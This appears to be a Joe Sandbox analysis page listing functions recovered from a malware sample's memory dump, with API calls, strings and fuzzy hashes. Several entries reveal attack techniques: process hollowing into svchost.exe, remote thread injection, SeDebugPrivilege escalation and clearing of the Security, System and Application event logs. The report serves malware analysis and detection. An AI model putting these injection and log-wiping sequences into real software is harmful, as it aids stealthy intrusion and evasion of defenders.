Function 02E60F30 Relevance: 20.3, APIs: 13, Instructions: 753COMMON

Download Yara Rule

APIs

Part of subcall function 02E55AD8: _getptd.LIBCMT ref: 02E55AEA

_errno.LIBCMT ref: 02E60FA7
_invalid_parameter_noinfo.LIBCMT ref: 02E60FB2
DecodePointer.KERNEL32 ref: 02E6158C
DecodePointer.KERNEL32 ref: 02E615CD
DecodePointer.KERNEL32 ref: 02E615F2
write_multi_char.LIBCMT ref: 02E6168C
write_multi_char.LIBCMT ref: 02E616C1
write_char.LIBCMT ref: 02E6170D
write_multi_char.LIBCMT ref: 02E61765
free.LIBCMT ref: 02E6178C
_errno.LIBCMT ref: 02E61A47
_invalid_parameter_noinfo.LIBCMT ref: 02E61A52

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: DecodePointerwrite_multi_char$_errno_invalid_parameter_noinfo$_getptdfreewrite_char
String ID:
API String ID: 3562693915-0
Opcode ID: e017b06b56cf3657e822e1d9cdd52de123d41ff819c9629cd0d88fe18efbce1b
Instruction ID: 79490d2f19183f7d9e2c2c3c737b35a2bc829575c77d4e85941631c9cb23df65
Opcode Fuzzy Hash: e017b06b56cf3657e822e1d9cdd52de123d41ff819c9629cd0d88fe18efbce1b
Instruction Fuzzy Hash: D542DE766C868086DB268B65D4483BE6B71F7817C8F28E116EF4E8FB94DB79C441CB40

Function 02E4F790 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 138registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 02E4F806
RegQueryValueExW.ADVAPI32 ref: 02E4F879
lstrcpyW.KERNEL32 ref: 02E4F9D0
RegCloseKey.ADVAPI32 ref: 02E4F9E2
RegCloseKey.ADVAPI32 ref: 02E4F9ED

Strings

%08X, xrefs: 02E4F97E

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Close$OpenQueryValuelstrcpy
String ID: %08X
API String ID: 2032971926-3773563069
Opcode ID: 0207c94b67bd13682df5198da5d4066036a53627cf85588037e8996df98b4a62
Instruction ID: 47f3d9947ca804e56700d66679f8d63c918280ee16c3848d1bd50765f921a7eb
Opcode Fuzzy Hash: 0207c94b67bd13682df5198da5d4066036a53627cf85588037e8996df98b4a62
Instruction Fuzzy Hash: 64515471358A8092DB60CF55F44879AB361F7C9B94F90A226EB9E43F68DF38C145CB00

Function 02E49650 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 102threadinjectionprocessCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32 ref: 02E496F0
CreateProcessA.KERNEL32 ref: 02E49758
VirtualAllocEx.KERNEL32 ref: 02E49789
WriteProcessMemory.KERNEL32 ref: 02E497AA
GetThreadContext.KERNEL32 ref: 02E497C4
SetThreadContext.KERNEL32 ref: 02E497DE
ResumeThread.KERNEL32 ref: 02E497F1

Strings

@, xrefs: 02E4977E
h, xrefs: 02E496C4
Windows\System32\svchost.exe, xrefs: 02E496F6
%s%s, xrefs: 02E49704

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Thread$ContextProcess$AllocCreateDirectoryMemoryResumeSystemVirtualWrite
String ID: %s%s$@$Windows\System32\svchost.exe$h
API String ID: 4033188109-2160973000
Opcode ID: f34bcb2dd40bef71e100a131e5ce0c990cbd285b2e4561fe4d7e6fc0a56b66df
Instruction ID: 04099a16e993b4e862d509034e548f64a2118a55f1433138d7da84fc6cb83e51
Opcode Fuzzy Hash: f34bcb2dd40bef71e100a131e5ce0c990cbd285b2e4561fe4d7e6fc0a56b66df
Instruction Fuzzy Hash: 54416C72244BC186EB20CF62F85479AB7A5F788788F446015DB8E57A68DF7DC115CB00

Function 02E48C80 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 02E48C95
OpenProcessToken.ADVAPI32 ref: 02E48CA8
LookupPrivilegeValueW.ADVAPI32 ref: 02E48CC8
AdjustTokenPrivileges.ADVAPI32 ref: 02E48CF2
CloseHandle.KERNEL32 ref: 02E48CFD
GetModuleHandleA.KERNEL32 ref: 02E48D0A
GetProcAddress.KERNEL32 ref: 02E48D1A
OpenProcess.KERNEL32 ref: 02E48D52

Strings

NtDll.dll, xrefs: 02E48D03
SeDebugPrivilege, xrefs: 02E48CB7
NtSetInformationProcess, xrefs: 02E48D10

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Process$HandleOpenToken$AddressAdjustCloseCurrentLookupModulePrivilegePrivilegesProcValue
String ID: NtDll.dll$NtSetInformationProcess$SeDebugPrivilege
API String ID: 2787840106-1577477132
Opcode ID: 006c88d0e4742fc9033daaec659e694211f69195633ac62cbb13f472629f2bb1
Instruction ID: 755c9d81be42f740b209340ffb0e0ce6ef3cd92da712db81c30a891e70b4bdcc
Opcode Fuzzy Hash: 006c88d0e4742fc9033daaec659e694211f69195633ac62cbb13f472629f2bb1
Instruction Fuzzy Hash: 3E217172659B8582EB10DB61F41C39A73A0FBD9B88F801115DA4F47B54EF7CC149CB40

Function 02E4C1A0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 169timeCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32 ref: 02E4C1E0
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 02E4C2A7
CreateEventW.KERNEL32 ref: 02E4C2E8
CreateEventW.KERNEL32 ref: 02E4C316
CreateEventW.KERNEL32 ref: 02E4C344
timeGetTime.WINMM ref: 02E4C45A
CreateEventW.KERNEL32 ref: 02E4C46F
CreateEventW.KERNEL32 ref: 02E4C483

Strings

<, xrefs: 02E4C227
<, xrefs: 02E4C22E

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CreateEvent$CountCriticalInitializeSectionSpinTimetime
String ID: <$<
API String ID: 4111701721-213342407
Opcode ID: 048dc3425349f8fc4623e606ca67483624ffdc734d22f1d365165c3f50b062b1
Instruction ID: 41b2b69dfa526012065e03198287836b3dfb6da4ad857892230ee99fb48b8977
Opcode Fuzzy Hash: 048dc3425349f8fc4623e606ca67483624ffdc734d22f1d365165c3f50b062b1
Instruction Fuzzy Hash: 10817972252B9186E7489F30F85879D37A9F344F4CF18923AEE598BB98CF788051CB54

Function 02E5D328 Relevance: 17.2, APIs: 11, Instructions: 726COMMON

Download Yara Rule

APIs

Part of subcall function 02E55AD8: _getptd.LIBCMT ref: 02E55AEA

_errno.LIBCMT ref: 02E5D39F
_invalid_parameter_noinfo.LIBCMT ref: 02E5D3AA
DecodePointer.KERNEL32 ref: 02E5D966
DecodePointer.KERNEL32 ref: 02E5D9A7
DecodePointer.KERNEL32 ref: 02E5D9CC
write_multi_char.LIBCMT ref: 02E5DA5E
write_multi_char.LIBCMT ref: 02E5DA93
write_char.LIBCMT ref: 02E5DAE2
write_multi_char.LIBCMT ref: 02E5DB3A

Part of subcall function 02E60E84: _errno.LIBCMT ref: 02E60EA8

free.LIBCMT ref: 02E5DB61

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: DecodePointerwrite_multi_char$_errno$_getptd_invalid_parameter_noinfofreewrite_char
String ID:
API String ID: 1806013980-0
Opcode ID: 1552cd673f4c9009c00e4e5aebb7c2d1653934e03051cbe30d545ed572ffd0fa
Instruction ID: ca964225cfc93eabee2f3394c4795adbf50daebf878bff8cd4e9c5f053e8331c
Opcode Fuzzy Hash: 1552cd673f4c9009c00e4e5aebb7c2d1653934e03051cbe30d545ed572ffd0fa
Instruction Fuzzy Hash: A94214726A86A086EB258F65DC403AE77B2F78279CF14B116DF4A97B94DB78C441CB00

Function 02E5BEDC Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 159fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_set_error_mode.LIBCMT ref: 02E5BF21
_set_error_mode.LIBCMT ref: 02E5BF32
GetModuleFileNameW.KERNEL32 ref: 02E5BF94
GetStdHandle.KERNEL32 ref: 02E5C0A9
WriteFile.KERNEL32 ref: 02E5C106

Strings

Runtime Error!Program: , xrefs: 02E5BF61
<program name unknown>, xrefs: 02E5BFA3
Microsoft Visual C++ Runtime Library, xrefs: 02E5C04D
..., xrefs: 02E5BFE6

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: File_set_error_mode$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 1085760375-4022980321
Opcode ID: bec6e322233c2a72ef1b69bf324003f95e38173e60baee35a0643b7f6f4324e7
Instruction ID: e0c24b97a209d0e32cf7c78882667877da3894b52845155277a16658040336bb
Opcode Fuzzy Hash: bec6e322233c2a72ef1b69bf324003f95e38173e60baee35a0643b7f6f4324e7
Instruction Fuzzy Hash: E151E3353A47A086EB24DB26B82875A7356FB857C8FA4B116EE5A43B54DF3CC105CA04

Function 02E55F90 Relevance: 15.3, APIs: 10, Instructions: 255COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 02E55FB2
_invalid_parameter_noinfo.LIBCMT ref: 02E55FBE
_errno.LIBCMT ref: 02E55FE8
__tzset.LIBCMT ref: 02E56005
_get_daylight.LIBCMT ref: 02E5600E
_get_daylight.LIBCMT ref: 02E5601F
_get_daylight.LIBCMT ref: 02E56030
_isindst.LIBCMT ref: 02E56074
_isindst.LIBCMT ref: 02E560C4
__getgmtimebuf.LIBCMT ref: 02E562BE

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _get_daylight$_errno_isindst$__getgmtimebuf__tzset_invalid_parameter_noinfo
String ID:
API String ID: 1457502553-0
Opcode ID: fc98137501184263b1711a368e79b6b7fedf990296f419f9690ea9b2a4686320
Instruction ID: ce8ac296183c590d97114ae3c941bbe29658ce5202a2a81e05317df09d370339
Opcode Fuzzy Hash: fc98137501184263b1711a368e79b6b7fedf990296f419f9690ea9b2a4686320
Instruction Fuzzy Hash: 7381C3B27607698BDB289F75C9557A963A6E7547C8F44E036EF0D8BB48EB38D100CB00

Function 02E492E0 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 02E492F7
OpenProcessToken.ADVAPI32 ref: 02E4930A
LookupPrivilegeValueW.ADVAPI32 ref: 02E49335
AdjustTokenPrivileges.ADVAPI32 ref: 02E49358
GetLastError.KERNEL32 ref: 02E4935E
CloseHandle.KERNEL32 ref: 02E4936D
CloseHandle.KERNEL32 ref: 02E49388

Strings

SeShutdownPrivilege, xrefs: 02E4931B

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3435690185-3733053543
Opcode ID: 3b408c9696417f386299ba55a60d1e887952e7de7df739ea596fa54433349fd8
Instruction ID: dcff6d3164a5393ad5fc3138d5eb15ef8876a2e63aaf5dca9864a67f7bf32b17
Opcode Fuzzy Hash: 3b408c9696417f386299ba55a60d1e887952e7de7df739ea596fa54433349fd8
Instruction Fuzzy Hash: 85118272668A8082EB509F25F45D35A73A0F7D8B85F806415E94F97A64DF3CC045CB00

Function 02E69CA0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02E55AD8: _getptd.LIBCMT ref: 02E55AEA

_errno.LIBCMT ref: 02E69CF0
_invalid_parameter_noinfo.LIBCMT ref: 02E69CFA
_errno.LIBCMT ref: 02E69D1C
_invalid_parameter_noinfo.LIBCMT ref: 02E69D28
_errno.LIBCMT ref: 02E69D50
_cftoe_l.LIBCMT ref: 02E69D94

Strings

gfffffff, xrefs: 02E6A01F

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _errno$_invalid_parameter_noinfo$_cftoe_l_getptd
String ID: gfffffff
API String ID: 1282097019-1523873471
Opcode ID: 2ccce6238921ff669830667409cdcc1f0cb7341e5ebed707410b45c5fc83ee90
Instruction ID: 6557aa79bbd007dcb8567cdb13701f6c84968222d83a79bad3415d96fd49312f
Opcode Fuzzy Hash: 2ccce6238921ff669830667409cdcc1f0cb7341e5ebed707410b45c5fc83ee90
Instruction Fuzzy Hash: 57A134637947C48ADB15CB3AC6483BD7BA5E7127E8F04E622DF590B796E7389025C310

Function 02E4A410 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75injectionmemorysynchronizationCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32 ref: 02E4A442
WriteProcessMemory.KERNEL32 ref: 02E4A4AE
WriteProcessMemory.KERNEL32 ref: 02E4A4D5
CreateRemoteThread.KERNEL32 ref: 02E4A4FA
WaitForSingleObject.KERNEL32 ref: 02E4A50B
VirtualFreeEx.KERNEL32 ref: 02E4A522

Strings

@, xrefs: 02E4A43A

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: MemoryProcessVirtualWrite$AllocCreateFreeObjectRemoteSingleThreadWait
String ID: @
API String ID: 1392168757-2766056989
Opcode ID: ebdf221f38e794e2455333eaf63dd99797fa0bae23e01971042895992485c932
Instruction ID: dce939f9673aa2cf6e1e760dd6d46751a74419fa52430a8bad1d7d44b3240825
Opcode Fuzzy Hash: ebdf221f38e794e2455333eaf63dd99797fa0bae23e01971042895992485c932
Instruction Fuzzy Hash: 47313A32248B8486EB60CB26F91875AB7A5F799BD4F545225EACD43F58DF3CC111CB40

Function 02E4A900 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 02E4A917
OpenProcessToken.ADVAPI32 ref: 02E4A928
LookupPrivilegeValueW.ADVAPI32 ref: 02E4A948
AdjustTokenPrivileges.ADVAPI32 ref: 02E4A970
GetLastError.KERNEL32 ref: 02E4A976
CloseHandle.KERNEL32 ref: 02E4A986

Strings

SeDebugPrivilege, xrefs: 02E4A937

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
String ID: SeDebugPrivilege
API String ID: 3398352648-2896544425
Opcode ID: 4520cdda6bbee7e720759b10c361dc6be193f20f51fac45c03cbca138d1582c9
Instruction ID: 3de038f2a76bddd1a05aa7eec06f7b94a1693520f4fa3b33e6009e7bc4fe6463
Opcode Fuzzy Hash: 4520cdda6bbee7e720759b10c361dc6be193f20f51fac45c03cbca138d1582c9
Instruction Fuzzy Hash: 79015272268B8582EB40DF25F84C34A77B0F798B98F802015EA8F43A24DF7CC059CB40

Function 02E54CD0 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 02E5B7BF
RtlLookupFunctionEntry.KERNEL32 ref: 02E5B7DE
RtlVirtualUnwind.KERNEL32 ref: 02E5B82A
IsDebuggerPresent.KERNEL32 ref: 02E5B89C
SetUnhandledExceptionFilter.KERNEL32 ref: 02E5B8B4
UnhandledExceptionFilter.KERNEL32 ref: 02E5B8C1
GetCurrentProcess.KERNEL32 ref: 02E5B8DA
TerminateProcess.KERNEL32 ref: 02E5B8E8

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
String ID:
API String ID: 3778485334-0
Opcode ID: 1c94f059e661cec249e69166cae7fc2ba1f8093385c11fe141dccac600b505b7
Instruction ID: 919d4efa7f5fd77531380ff80453aa02cd60a49406a7011f42dc62839df8aa16
Opcode Fuzzy Hash: 1c94f059e661cec249e69166cae7fc2ba1f8093385c11fe141dccac600b505b7
Instruction Fuzzy Hash: 72313635299BC586EB50DF51F84C39A73A4F785398F50502AEA8E43BA8EF7DC094CB00

Function 02E5E590 Relevance: 10.6, APIs: 7, Instructions: 142COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 02E5E5F4

Part of subcall function 02E5A860: Sleep.KERNEL32 ref: 02E5A8A5

free.LIBCMT ref: 02E5E672
free.LIBCMT ref: 02E5E6B9
GetLocaleInfoW.KERNEL32 ref: 02E5E6F0
GetLocaleInfoW.KERNEL32 ref: 02E5E71A
free.LIBCMT ref: 02E5E727
GetLocaleInfoW.KERNEL32 ref: 02E5E752

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: InfoLocalefree$ErrorLastSleep
String ID:
API String ID: 3746651342-0
Opcode ID: f411498c33e338e04b103db1a04ef947ba4a4d6889c3b4acdbdfe8f2a9a6c589
Instruction ID: 9e3b2f3a5e28f4c2cc8d4ebd362c7417b3606b87e3deb95d6efb75b9a9ebbaa6
Opcode Fuzzy Hash: f411498c33e338e04b103db1a04ef947ba4a4d6889c3b4acdbdfe8f2a9a6c589
Instruction Fuzzy Hash: E34129227707A442EB349B62A81877A72D5BB94BCCF04F125DE0A47B45EF7DC501CB41

Function 02E4E03A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 32COMMON

Download Yara Rule

APIs

OpenEventLogW.ADVAPI32 ref: 02E4E067
ClearEventLogW.ADVAPI32 ref: 02E4E07A
CloseEventLog.ADVAPI32 ref: 02E4E083

Strings

Security, xrefs: 02E4E045
System, xrefs: 02E4E050
Application, xrefs: 02E4E03A

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Event$ClearCloseOpen
String ID: Application$Security$System
API String ID: 1391105993-2169399579
Opcode ID: 3bc1dfbc75c3ebd05fd2da803e87ea6cab878e66fd4d64df736414c5c99f1579
Instruction ID: 61fca9cb93d29aebd3bba9e6d19f7db23865b4607da6b911505e70b29bedd2d1
Opcode Fuzzy Hash: 3bc1dfbc75c3ebd05fd2da803e87ea6cab878e66fd4d64df736414c5c99f1579
Instruction Fuzzy Hash: 75F0363668AF80C5EB56DF25F84839573A4F758798F449136CD5E03B64EE38C155D300

Function 02E5C1C4 Relevance: 9.1, APIs: 6, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 02E5C231
RtlLookupFunctionEntry.KERNEL32 ref: 02E5C249
RtlVirtualUnwind.KERNEL32 ref: 02E5C283
IsDebuggerPresent.KERNEL32 ref: 02E5C2B9
SetUnhandledExceptionFilter.KERNEL32 ref: 02E5C2C3
UnhandledExceptionFilter.KERNEL32 ref: 02E5C2CE

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 3d258a40fe85b90a637c04ac03ec31110b46b64e3441f59e6290187bd834b7bf
Instruction ID: 2daf94bd0df70abb13a93d74a382cb131c9249d950c58174055d83dc7fceae3d
Opcode Fuzzy Hash: 3d258a40fe85b90a637c04ac03ec31110b46b64e3441f59e6290187bd834b7bf
Instruction Fuzzy Hash: 4B31BE32254F8186DB20CF65E8547AE73A4F7887A8F60622AEE9D43B58DF38C555CB00

Function 02E48E00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 02E48E13
OpenProcessToken.ADVAPI32 ref: 02E48E26
LookupPrivilegeValueW.ADVAPI32 ref: 02E48E55
AdjustTokenPrivileges.ADVAPI32 ref: 02E48E9A

Strings

SeDebugPrivilege, xrefs: 02E48E4C

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
String ID: SeDebugPrivilege
API String ID: 2349140579-2896544425
Opcode ID: e89a9577fea48bf07b96b5dd8fdb992d40661bb12393655a7267710922112fa6
Instruction ID: dd1464f403e893783824da7b23146941317362beebf706179cc3bd92bfcfa093
Opcode Fuzzy Hash: e89a9577fea48bf07b96b5dd8fdb992d40661bb12393655a7267710922112fa6
Instruction Fuzzy Hash: 39112176659B8182EB50DF65F84938AB3A0F7D9B88FC45016EA8E47B14DF7DC019CB00

Function 02E43BA0 Relevance: 7.8, APIs: 5, Instructions: 251memorytimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 02E43C6A
VirtualAlloc.KERNEL32 ref: 02E43CDF
VirtualFree.KERNEL32 ref: 02E43D19
VirtualAlloc.KERNEL32 ref: 02E43E75
VirtualFree.KERNEL32 ref: 02E43EAA

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Virtual$AllocFree$Timetime
String ID:
API String ID: 3637049079-0
Opcode ID: 315d6375471e1a4f99404568f3a68aecd704ec3ded472f731a93e9d2a0cb6b08
Instruction ID: 16bc0dcd657cd1b15f3e7a03b0710fca728f12f066774526c2734295fac729e1
Opcode Fuzzy Hash: 315d6375471e1a4f99404568f3a68aecd704ec3ded472f731a93e9d2a0cb6b08
Instruction Fuzzy Hash: 5191F132310B9497CB19DF2AE154B6D77A2FB45B88F10E529DE0A87B44EF34D9A1CB40

Function 02E45930 Relevance: 7.8, APIs: 5, Instructions: 250memorytimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 02E45A08
VirtualAlloc.KERNEL32 ref: 02E45A83
VirtualFree.KERNEL32 ref: 02E45ABD
VirtualAlloc.KERNEL32 ref: 02E45C27
VirtualFree.KERNEL32 ref: 02E45C5C

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Virtual$AllocFree$Timetime
String ID:
API String ID: 3637049079-0
Opcode ID: 84916634be90c530f7462dae8c686f5c956e195b309b681075306a52318ba857
Instruction ID: 54594809eb9bf2adf31f620c69bab8d2f11672e2c451b992d1f36054abf921cb
Opcode Fuzzy Hash: 84916634be90c530f7462dae8c686f5c956e195b309b681075306a52318ba857
Instruction Fuzzy Hash: 30911372350A949BCB19CF29E15476D73A1F784B88F84D529DF0A87B04EF34D9A1C780

Function 02E65D50 Relevance: 7.7, APIs: 5, Instructions: 165COMMON

Download Yara Rule

APIs

_getptd.LIBCMT ref: 02E65D77

Part of subcall function 02E5DF90: _amsg_exit.LIBCMT ref: 02E5DFA6

GetLocaleInfoA.KERNEL32 ref: 02E65DAC
GetLocaleInfoA.KERNEL32 ref: 02E65E04
GetLocaleInfoA.KERNEL32 ref: 02E65EF8

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: InfoLocale$_amsg_exit_getptd
String ID:
API String ID: 3133215516-0
Opcode ID: f3123c2221976c618b7d76a248a557ec73608dd870584710d301b4c347307875
Instruction ID: 4b6018aed6b444c8f50b8ac64ea1796da1ca62df4b2ee4052d0bcce946db86bd
Opcode Fuzzy Hash: f3123c2221976c618b7d76a248a557ec73608dd870584710d301b4c347307875
Instruction Fuzzy Hash: 53615072390AC1DBDB198F61D95C7EEB3A1F788789F84A02AD71987744DB38E464CB00

Function 02E673F4 Relevance: 7.6, APIs: 5, Instructions: 102COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32 ref: 02E6743F
GetLocaleInfoW.KERNEL32 ref: 02E674D0
WideCharToMultiByte.KERNEL32 ref: 02E6750B
free.LIBCMT ref: 02E6751F

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: InfoLocale$ByteCharMultiWidefree
String ID:
API String ID: 40707599-0
Opcode ID: 9d849a486a771a2ba975f60ce01952f084c2181aa9eeb1ca35fe4748fd4a6f39
Instruction ID: 7d9dc8609d1157fba21dcfb79576e987213981126c6cb05b945c5903186cbfc4
